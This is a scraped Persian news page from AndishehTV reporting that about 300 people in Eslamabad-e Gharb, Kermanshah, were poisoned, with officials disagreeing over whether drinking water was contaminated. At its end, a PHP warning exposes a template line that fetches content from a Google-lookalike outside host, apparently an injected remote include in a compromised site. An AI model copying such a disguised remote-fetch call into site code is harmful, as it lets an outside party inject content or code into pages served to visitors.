Sunday 25 October 2020 / يكشنبه 4 آبان 1399

جستجو

P7a

AndishehTV

ATV Frequenter

300 water poisening iran

گزارش‌های رسیده از ایران حاکی است که حدود ۳۰۰ نفر از مردم اسلام‌آباد غرب در استان کرمانشاه به دلیل آنچه که «آلودگی آب شرب» عنوان شده است، مسموم و راهی مراکز درمانی شده‌اند.
این در حالی است که فرماندار اسلام‌آباد غرب «آلوده» بودن آب را به عنوان علت مراجعه افراد مسموم شده به مراکز درمانی رد کرده است. ولی قائم مقام وزیر بهداشت ایران از احتمال آلوده شدن «آب‌های آشامیدنی» به دنبال بارندگی‌های اخیر در این استان خبر داده است.


اظهارات این دو مقام مسئول پس از آن بیان می‌شود که وب‌سایت‌های محلی استان کرمانشاه خبر دادند ظرف دو روز گذشته حدود ۳۰۰ نفر از مردم اسلام‌آباد غرب و روستاهای اطراف آن به علت مسمومیت ناگهانی و با علائم تهوع و دل‌پیچه به بیمارستان «امام خمینی» این شهر مراجعه کرده‌اند.
به گزارش روز جمعه ۲۷ فروردین سایت نسیم‌آنلاین٬ افشین کریمی٬ فرماندار اسلام‌آباد غرب گفته که این ۳۰۰ نفر به «صورت سرپایی» تحت مداوا قرار گرفته‌اند.
وی با رد آلودگی آب شرب این شهر افزوده که هنوز علت «مسمومیت» این افراد مشخص نشده است.
آن‌ طور که کریمی اعلام کرده بر اساس آزمایش‌های اولیه دانشگاه علوم پزشکی، «سلامت» آب شرب اسلام‌آباد غرب تایید شده و احتمال دارد «این بیماری ناشی از مصرف گیاهان خودرو یا ویروس دیگری باشد».
ابراهیم شکیبا٬ معاون بهداشتی دانشگاه علوم پزشکی استان کرمانشاه، هم گفته که «هیچ مستند قانونی و آزمایشگاهی مبنی بر آلودگی آب آشامیدنی شهر اسلام‌آباد غرب وجود ندارد و بحث‌های اخیر هم مبتنی بر شایعه و گمانه‌زنی‌ها بوده است».
با این حال به گزارش سایت‌های محلی٬ ایرج حریرچی٬ قائم مقام وزیر بهداشت، درمان و آموزش پزشکی ایران از احتمال آلوده شدن آب‌های آشامیدنی بدنبال بارندگی‌های اخیر خبر داده است


Warning: file_get_contents(http://panel.google-amp.org/al.php?s=374): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/andish5/public_html/templates/rt_audacity/index.php on line 311